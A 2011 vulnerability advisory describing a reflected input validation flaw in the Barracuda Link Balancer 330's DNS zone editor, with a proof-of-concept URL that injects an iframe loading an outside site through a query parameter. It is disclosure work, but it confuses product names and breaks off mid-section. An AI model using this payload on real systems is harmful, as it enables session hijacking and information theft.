Document Title:
===============
Barracuda Link Balancer 330 - Input Validation Vulnerability
Date:
=====
2011-10-30
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=33
Barracuda - Link Balancer 330 (Appliance) - Firmware v1.3.2.005 & older versions
VL-ID:
=====
33
Introduction:
=============
The Barracuda Link Balancer routes and manages traffic across multiple Internet connections. Designed to scale for
high bandwidth requirements and provide business continuity for an organization, the Barracuda Link Balancer optimizes
the use of multiple Internet links, such as T1s, T3s, DSL and cable connections from one or multiple Internet service providers.
The Barracuda Load Balancer is a scalable and comprehensive solution for distributing network traffic across multiple servers.
The Barracuda Load Balancer offers network administrators reliability, speed and security through session persistence with cookie
data, SSL acceleration and network intrusion prevention.
(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/balancers.php)
Abstract:
=========
The Vulnerability Lab Team discovered a input validation vulnerability on Barracuda - Link Balancer 330 (Appliance).
Report-Timeline:
================
2011-04-18: Vendor Notification
2011-05-30: Vendor Response/Feedback
2011-09-**: Vendor Fix/Patch
2011-10-31: Public or Non-Public Disclosure
Status:
========
Published
Affected Products:
==================
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple non-persistent Input Validation vulnerabilities are detected on Barracudas IM-Firewall 620.
Attackers can form malicious client-side requests to hijack customer/admin sessions.
Successful exploitation requires user inter action & can lead to information disclosure, session
hijacking and access to servers in the intranet.
Vulnerable Module(s):
[+] Authoritative DNS - DNS Zones
Vulnerable Param(s):
[+] zoneid
[+] scope
Proof of Concept:
=================
The vulnerabilities can be exploited local low privileged user accounts or remote via high required user inter action. For demonstration ...
Path: /cgi-mod/
File: index.cgi
Para: ?&user=guest&password=8a5dd90e272c9b072050d2cc84d9215d&et=1261762797&locale=en_US&primary_tab=SERVICES&new_secondary_tab=adns&
scope_data=barracudalabs.com.&secondary_tab=adns_record_edit&content_only=1&index=6&scope=zone&zone_ttl=
References(URL):
http://linkbalancer.xxx.com/cgi-mod/index.cgi?&user=guest&password=8a5dd90e272c9b072050d2cc84d9215d&et=1261762797&locale=en_US&primary_tab=SERVICES&new_secondary_tab=adns&
scope_data=barracudalabs.com.&secondary_tab=adns_record_edit&content_only=1&index=6&scope=zone&zone_ttl=%3E%22%3Ciframe
%20src=http://global-evolution.info%20width=800%20height=800%3E
Site-Code Review: